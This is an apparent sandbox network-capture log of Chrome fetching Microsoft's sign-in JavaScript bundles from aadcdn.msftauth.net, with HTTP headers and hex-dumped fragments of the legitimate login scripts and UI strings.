                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:45 UTC750INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 3490732
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: FH5pMpu6b85N3p947XewnA==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:44 GMT
                                                                                                                                          Etag: 0x8DCE4DDC9563CC2
                                                                                                                                          Last-Modified: Sat, 05 Oct 2024 01:33:59 GMT
                                                                                                                                          Server: ECAcc (lhc/7966)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: c1c9facd-f01e-0047-7abd-19ea3c000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 449972
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 44 49 4e 47 5f 4e 4f 54 5f 41 4c 4c 4f 57 45 44 3a 22 38 30 30 34 37 38 44 37 22 2c 50 50 5f 45 5f 49 44 50 5f 42 49 4e 44 49 4e 47 5f 45 58 49 53 54 53 5f 53 41 4d 53 55 4e 47 3a 22 38 30 30 34 34 35 33 45 22 2c 50 50 5f 45 5f 54 52 41 4e 53 46 45 52 5f 54 4f 4b 45 4e 5f 49 4e 56 41 4c 49 44 5f 53 45 53 53 49 4f 4e 3a 22 38 30 30 34 33 35 41 30 22 7d 2c 6e 2e 45 73 74 73 45 72 72 6f 72 3d 7b 55 73 65 72 41 63 63 6f 75 6e 74 53 65 6c 65 63 74 69 6f 6e 49 6e 76 61 6c 69 64 3a 22 31 36 30 30 31 22 2c 55 73 65 72 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 22 35 30 30 32 30 22 2c 55 73 65 72 55 6e 61 75 74 68 6f 72 69 7a 65 64 41 70 69 56 65 72 73 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3a 22 35 30 30 32 30 31 22 2c 55 73 65 72 55 6e 61 75 74 68 6f 72 69 7a
                                                                                                                                          Data Ascii: DING_NOT_ALLOWED:"800478D7",PP_E_IDP_BINDING_EXISTS_SAMSUNG:"8004453E",PP_E_TRANSFER_TOKEN_INVALID_SESSION:"800435A0"},n.EstsError={UserAccountSelectionInvalid:"16001",UserUnauthorized:"50020",UserUnauthorizedApiVersionNotSupported:"500201",UserUnauthoriz
                                                                                                                                          2024-11-18 05:47:45 UTC2INData Raw: 64 6f
                                                                                                                                          Data Ascii: do
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3a 65 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3f 65 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3a 7b 7d 7d 2c 68 69 73 74 6f 72 79 3a 7b 70 75 73 68 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 54 2e 69 73 48 69 73 74 6f 72 79 53 75 70 70 6f 72 74 65 64 28 29 26 26 75 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 65 2c 6e 29 7d 2c 72 65 70 6c 61 63 65 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 54 2e 69 73 48 69 73 74 6f 72 79 53 75 70 70 6f 72 74 65 64 28 29 26 26 75 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 65 2c 6e 29 7d 7d 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65
                                                                                                                                          Data Ascii: cument.defaultView.getComputedStyle(e,null):e.currentStyle?e.currentStyle:{}},history:{pushState:function(e,n){T.isHistorySupported()&&u.history.pushState(e,n)},replaceState:function(e,n){T.isHistorySupported()&&u.history.replaceState(e,n)}},addEventListe
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 72 6f 70 65 72 74 79 4c 6f 67 4f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 28 6e 3d 6e 7c 7c 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 74 72 61 63 69 6e 67 50 72 6f 70 65 72 74 79 43 68 61 6e 67 65 22 29 7c 7c 28 6e 2e 74 72 61 63 69 6e 67 50 72 6f 70 65 72 74 79 43 68 61 6e 67 65 3d 21 30 29 2c 6e 2e 65 76 65 6e 74 4c 65 76 65 6c 3d 6e 2e 65 76 65 6e 74 4c 65 76 65 6c 7c 7c 69 2e 45 76 65 6e 74 4c 65 76 65 6c 2e 49 6e 66 6f 2c 7b 76 69 65 77 4d 6f 64 65 6c 3a 65 2c 74 72 61 63 69 6e 67 4f 70 74 69 6f 6e 73 3a 6e 7d 7d 2c 73 2e 67 65 74 44 65 66 61 75 6c 74 54 65 78 74 42 6f 78 50 72 6f 70 65 72 74 79 4c 6f 67 4f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 28 6e 3d 6e
                                                                                                                                          Data Ascii: ropertyLogOption=function(e,n){return(n=n||{}).hasOwnProperty("tracingPropertyChange")||(n.tracingPropertyChange=!0),n.eventLevel=n.eventLevel||i.EventLevel.Info,{viewModel:e,tracingOptions:n}},s.getDefaultTextBoxPropertyLogOption=function(e,n){return(n=n
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 72 20 6e 3d 65 2e 75 73 65 72 6e 61 6d 65 7c 7c 22 22 2c 74 3d 65 2e 66 6c 6f 77 54 6f 6b 65 6e 7c 7c 22 22 2c 69 3d 65 2e 70 75 72 70 6f 73 65 7c 7c 63 2e 50 61 73 73 77 6f 72 64 2c 61 3d 65 2e 70 72 6f 6f 66 54 79 70 65 2c 6f 3d 65 2e 70 72 6f 6f 66 44 61 74 61 7c 7c 22 22 2c 72 3d 65 2e 69 73 45 6e 63 72 79 70 74 65 64 2c 73 3d 65 2e 75 69 4d 6f 64 65 2c 64 3d 65 2e 6c 63 69 64 2c 6c 3d 65 2e 70 68 6f 6e 65 43 6f 75 6e 74 72 79 7c 7c 22 22 2c 70 3d 65 2e 70 68 6f 6e 65 43 6f 75 6e 74 72 79 43 6f 64 65 7c 7c 22 22 2c 6d 3d 65 2e 75 6e 61 75 74 68 53 65 73 73 69 6f 6e 49 64 2c 62 3d 65 2e 70 72 6f 6f 66 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2c 76 3d 65 2e 63 61 6e 61 72 79 46 6c 6f 77 54 6f 6b 65 6e 3b 74 68 69 73 5b 75 2e 55 73 65 72 6e 61 6d 65 5d 3d 6e
                                                                                                                                          Data Ascii: r n=e.username||"",t=e.flowToken||"",i=e.purpose||c.Password,a=e.proofType,o=e.proofData||"",r=e.isEncrypted,s=e.uiMode,d=e.lcid,l=e.phoneCountry||"",p=e.phoneCountryCode||"",m=e.unauthSessionId,b=e.proofConfirmation,v=e.canaryFlowToken;this[u.Username]=n
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 67 2e 63 6c 6f 6e 65 28 67 65 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 69 26 26 28 69 2e 75 6e 73 61 66 65 5f 75 73 65 72 6e 61 6d 65 3d 6e 29 2c 6c 6e 28 65 2c 69 2c 21 30 2c 6c 2e 45 76 65 6e 74 49 64 73 2e 52 65 64 69 72 65 63 74 5f 4f 74 68 65 72 49 64 70 52 65 64 69 72 65 63 74 69 6f 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 74 6e 28 65 2c 6e 2c 74 29 7b 74 3d 74 7c 7c 6c 65 2c 74 3d 70 2e 72 65 6d 6f 76 65 28 74 2c 22 75 73 65 72 6e 61 6d 65 22 29 2c 74 3d 70 2e 72 65 6d 6f 76 65 28 74 2c 22 6c 6f 67 69 6e 5f 68 69 6e 74 22 29 3b 76 61 72 20 69 3d 70 65 3f 67 2e 63 6c 6f 6e 65 28 70 65 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 6e 26 26 28 6e 2e 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 3d 3d 3d 53 2e 4e 6f 74 45 78 69 73 74 7c 7c 6e 2e 49 73 55 6e 6d 61
                                                                                                                                          Data Ascii: g.clone(ge):null;return i&&(i.unsafe_username=n),ln(e,i,!0,l.EventIds.Redirect_OtherIdpRedirection)}function tn(e,n,t){t=t||le,t=p.remove(t,"username"),t=p.remove(t,"login_hint");var i=pe?g.clone(pe):null;return n&&(n.IfExistsResult===S.NotExist||n.IsUnma
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 2e 73 68 6f 77 46 6f 72 67 6f 74 55 73 65 72 6e 61 6d 65 2c 68 3d 65 2e 68 69 64 65 43 72 65 64 53 77 69 74 63 68 4c 69 6e 6b 2c 5f 3d 65 2e 61 72 69 61 44 65 73 63 72 69 62 65 64 42 79 2c 43 3d 65 2e 73 65 74 46 6f 63 75 73 2c 53 3d 74 2e 73 74 72 2c 78 3d 74 2e 75 72 6c 46 6f 72 67 6f 74 55 73 65 72 6e 61 6d 65 2c 77 3d 74 2e 73 53 69 74 65 49 64 2c 79 3d 74 2e 73 43 6c 69 65 6e 74 49 64 2c 6b 3d 74 2e 73 46 6f 72 77 61 72 64 65 64 43 6c 69 65 6e 74 49 64 2c 50 3d 74 2e 73 4e 6f 50 61 42 75 62 62 6c 65 56 65 72 73 69 6f 6e 2c 54 3d 74 2e 66 53 68 6f 77 53 69 67 6e 49 6e 4f 70 74 69 6f 6e 73 41 73 42 75 74 74 6f 6e 2c 44 3d 74 2e 66 4f 66 66 6c 69 6e 65 41 63 63 6f 75 6e 74 56 69 73 69 62 6c 65 2c 45 3d 74 2e 66 55 73 65 43 65 72 74 69 66 69 63 61 74 65
                                                                                                                                          Data Ascii: .showForgotUsername,h=e.hideCredSwitchLink,_=e.ariaDescribedBy,C=e.setFocus,S=t.str,x=t.urlForgotUsername,w=t.sSiteId,y=t.sClientId,k=t.sForwardedClientId,P=t.sNoPaBubbleVersion,T=t.fShowSignInOptionsAsButton,D=t.fOfflineAccountVisible,E=t.fUseCertificate
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 64 61 74 69 6f 6e 20 66 61 69 6c 65 64 2c 20 75 73 65 72 20 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 22 2c 74 68 69 73 2e 73 74 61 63 6b 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 2c 74 68 69 73 2e 69 6e 6e 65 72 45 72 72 6f 72 3d 65 2c 74 68 69 73 2e 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 56 69 65 77 49 64 3d 6e 2c 74 68 69 73 2e 70 6f 73 74 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 41 63 74 69 6f 6e 3d 74 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 6c 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 74 28 33 29 2c 61 3d 74 28 37 29 2c 6f 3d 69 2e 41 72 72 61 79 2c 72 3d 7b 6d 65 72 67 65 53 65 73 73 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 5b 5d 3b 72 65 74 75 72 6e 20 6f
                                                                                                                                          Data Ascii: dation failed, user confirmation required.",this.stack=(new Error).stack,this.innerError=e,this.confirmationViewId=n,this.postConfirmationAction=t},e.exports=l},function(e,n,t){var i=t(3),a=t(7),o=i.Array,r={mergeSessions:function(e,n,t){var i=[];return o
                                                                                                                                          2024-11-18 05:47:45 UTC6INData Raw: 6c 43 64 6e 2c 69
                                                                                                                                          Data Ascii: lCdn,i


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.1655160152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:44 UTC656OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://login.microsoftonline.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:45 UTC749INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 7071338
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: wheuNbhZLcnx5oBIfa0JTw==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:44 GMT
                                                                                                                                          Etag: 0x8DCC6D4DD76DEA7
                                                                                                                                          Last-Modified: Tue, 27 Aug 2024 20:14:33 GMT
                                                                                                                                          Server: ECAcc (lhc/794B)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 5fcf6533-b01e-000b-222d-f97a0c000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 57443
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 69 5b 6e 5d 29 72 65 74 75 72 6e 20 69 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 69 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 74 2e 6c 6f 61 64 65 64 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 69 2c 6f 2e 70 3d 22 22 2c 6f 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 69 29 7b 69 28 32 29 3b 76 61 72 20 6e 3d 69 28 31 29 2c 74 3d 69 28 35 29 2c 72 3d 69 28 36 29 2c 61 3d 72 2e 53 74 72 69 6e
                                                                                                                                          Data Ascii: !function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.Strin
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 44 65 73 63 72 69 70 74 69 6f 6e 5f 55 6e 66 61 6d 69 6c 69 61 72 44 65 76 69 63 65 3d 22 54 6f 20 73 69 67 6e 20 69 6e 20 77 69 74 68 20 7b 30 7d 2c 20 70 6c 65 61 73 65 20 66 6f 6c 6c 6f 77 20 74 68 65 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 6f 6e 20 79 6f 75 72 20 70 68 6f 6e 65 20 61 6e 64 20 65 6e 74 65 72 20 74 68 65 20 6e 75 6d 62 65 72 20 79 6f 75 20 73 65 65 20 62 65 6c 6f 77 2e 22 2c 65 2e 43 54 5f 52 4e 47 43 5f 53 54 52 5f 4c 53 5f 54 69 6d 65 6f 75 74 5f 54 69 74 6c 65 3d 22 52 65 71 75 65 73 74 20 74 69 6d 65 6f 75 74 22 2c 65 2e 43 54 5f 52 4e 47 43 5f 53 54 52 5f 4c 53 5f 54 69 6d 65 6f 75 74 5f 50 61 67 65 44 65 73 63 72 69 70 74 69 6f 6e 3d 22 57 65 20 64 69 64 6e 27 74 20 68 65 61 72 20 66 72 6f 6d 20 79 6f 75 20 69 6e 20 74 69 6d 65
                                                                                                                                          Data Ascii: Description_UnfamiliarDevice="To sign in with {0}, please follow the instructions on your phone and enter the number you see below.",e.CT_RNGC_STR_LS_Timeout_Title="Request timeout",e.CT_RNGC_STR_LS_Timeout_PageDescription="We didn't hear from you in time
                                                                                                                                          2024-11-18 05:47:45 UTC2INData Raw: 22 2c
                                                                                                                                          Data Ascii: ",
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 65 2e 53 54 52 5f 4e 61 74 69 76 65 5f 53 53 50 52 5f 45 6e 74 65 72 43 6f 64 65 5f 44 65 73 63 3d 22 45 6e 74 65 72 20 74 68 65 20 63 6f 64 65 20 77 65 20 6a 75 73 74 20 73 65 6e 74 20 74 6f 20 7b 30 7d 20 74 6f 20 72 65 73 65 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 2e 22 2c 65 2e 53 54 52 5f 43 65 72 74 42 61 73 65 41 75 74 68 50 6f 6c 69 63 79 5f 42 6c 6f 63 6b 3d 22 59 6f 75 20 63 61 6e 27 74 20 73 69 67 6e 20 69 6e 20 77 69 74 68 20 61 20 63 65 72 74 69 66 69 63 61 74 65 2e 20 54 72 79 20 73 69 67 6e 69 6e 67 20 69 6e 20 77 69 74 68 20 61 6e 6f 74 68 65 72 20 6d 65 74 68 6f 64 2e 22 2c 65 2e 53 54 52 5f 49 6e 76 61 6c 69 64 43 72 65 64 65 6e 74 69 61 6c 44 75 65 54 6f 4d 66 61 43 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 3d 22 4d 75 6c 74 69 66 61
                                                                                                                                          Data Ascii: e.STR_Native_SSPR_EnterCode_Desc="Enter the code we just sent to {0} to reset your password.",e.STR_CertBaseAuthPolicy_Block="You can't sign in with a certificate. Try signing in with another method.",e.STR_InvalidCredentialDueToMfaClassification="Multifa
                                                                                                                                          2024-11-18 05:47:45 UTC8292INData Raw: 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 43 61 6c 6c 57 65 6e 74 54 6f 56 6f 69 63 65 6d 61 69 6c 3a 22 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 43 61 6c 6c 57 65 6e 74 54 6f 56 6f 69 63 65 6d 61 69 6c 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 49 6e 76 61 6c 69 64 50 68 6f 6e 65 49 6e 70 75 74 3a 22 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 49 6e 76 61 6c 69 64 50 68 6f 6e 65 49 6e 70 75 74 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 50 68 6f 6e 65 48 75 6e 67 55 70 3a 22 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 50 68 6f 6e 65 48 75 6e 67 55 70 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 49 6e 76 61 6c 69 64 50 68 6f 6e 65 4e 75 6d 62
                                                                                                                                          Data Ascii: UserVoiceAuthFailedCallWentToVoicemail:"UserVoiceAuthFailedCallWentToVoicemail",UserVoiceAuthFailedInvalidPhoneInput:"UserVoiceAuthFailedInvalidPhoneInput",UserVoiceAuthFailedPhoneHungUp:"UserVoiceAuthFailedPhoneHungUp",UserVoiceAuthFailedInvalidPhoneNumb


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.1655163152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:46 UTC431OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:46 UTC749INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 7071340
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: wheuNbhZLcnx5oBIfa0JTw==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:46 GMT
                                                                                                                                          Etag: 0x8DCC6D4DD76DEA7
                                                                                                                                          Last-Modified: Tue, 27 Aug 2024 20:14:33 GMT
                                                                                                                                          Server: ECAcc (lhc/794B)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 5fcf6533-b01e-000b-222d-f97a0c000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 57443
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:46 UTC16383INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 69 5b 6e 5d 29 72 65 74 75 72 6e 20 69 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 69 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 74 2e 6c 6f 61 64 65 64 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 69 2c 6f 2e 70 3d 22 22 2c 6f 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 69 29 7b 69 28 32 29 3b 76 61 72 20 6e 3d 69 28 31 29 2c 74 3d 69 28 35 29 2c 72 3d 69 28 36 29 2c 61 3d 72 2e 53 74 72 69 6e
                                                                                                                                          Data Ascii: !function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.Strin
                                                                                                                                          2024-11-18 05:47:46 UTC16383INData Raw: 44 65 73 63 72 69 70 74 69 6f 6e 5f 55 6e 66 61 6d 69 6c 69 61 72 44 65 76 69 63 65 3d 22 54 6f 20 73 69 67 6e 20 69 6e 20 77 69 74 68 20 7b 30 7d 2c 20 70 6c 65 61 73 65 20 66 6f 6c 6c 6f 77 20 74 68 65 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 6f 6e 20 79 6f 75 72 20 70 68 6f 6e 65 20 61 6e 64 20 65 6e 74 65 72 20 74 68 65 20 6e 75 6d 62 65 72 20 79 6f 75 20 73 65 65 20 62 65 6c 6f 77 2e 22 2c 65 2e 43 54 5f 52 4e 47 43 5f 53 54 52 5f 4c 53 5f 54 69 6d 65 6f 75 74 5f 54 69 74 6c 65 3d 22 52 65 71 75 65 73 74 20 74 69 6d 65 6f 75 74 22 2c 65 2e 43 54 5f 52 4e 47 43 5f 53 54 52 5f 4c 53 5f 54 69 6d 65 6f 75 74 5f 50 61 67 65 44 65 73 63 72 69 70 74 69 6f 6e 3d 22 57 65 20 64 69 64 6e 27 74 20 68 65 61 72 20 66 72 6f 6d 20 79 6f 75 20 69 6e 20 74 69 6d 65
                                                                                                                                          Data Ascii: Description_UnfamiliarDevice="To sign in with {0}, please follow the instructions on your phone and enter the number you see below.",e.CT_RNGC_STR_LS_Timeout_Title="Request timeout",e.CT_RNGC_STR_LS_Timeout_PageDescription="We didn't hear from you in time
                                                                                                                                          2024-11-18 05:47:46 UTC16383INData Raw: 22 2c 65 2e 53 54 52 5f 4e 61 74 69 76 65 5f 53 53 50 52 5f 45 6e 74 65 72 43 6f 64 65 5f 44 65 73 63 3d 22 45 6e 74 65 72 20 74 68 65 20 63 6f 64 65 20 77 65 20 6a 75 73 74 20 73 65 6e 74 20 74 6f 20 7b 30 7d 20 74 6f 20 72 65 73 65 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 2e 22 2c 65 2e 53 54 52 5f 43 65 72 74 42 61 73 65 41 75 74 68 50 6f 6c 69 63 79 5f 42 6c 6f 63 6b 3d 22 59 6f 75 20 63 61 6e 27 74 20 73 69 67 6e 20 69 6e 20 77 69 74 68 20 61 20 63 65 72 74 69 66 69 63 61 74 65 2e 20 54 72 79 20 73 69 67 6e 69 6e 67 20 69 6e 20 77 69 74 68 20 61 6e 6f 74 68 65 72 20 6d 65 74 68 6f 64 2e 22 2c 65 2e 53 54 52 5f 49 6e 76 61 6c 69 64 43 72 65 64 65 6e 74 69 61 6c 44 75 65 54 6f 4d 66 61 43 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 3d 22 4d 75 6c 74 69
                                                                                                                                          Data Ascii: ",e.STR_Native_SSPR_EnterCode_Desc="Enter the code we just sent to {0} to reset your password.",e.STR_CertBaseAuthPolicy_Block="You can't sign in with a certificate. Try signing in with another method.",e.STR_InvalidCredentialDueToMfaClassification="Multi
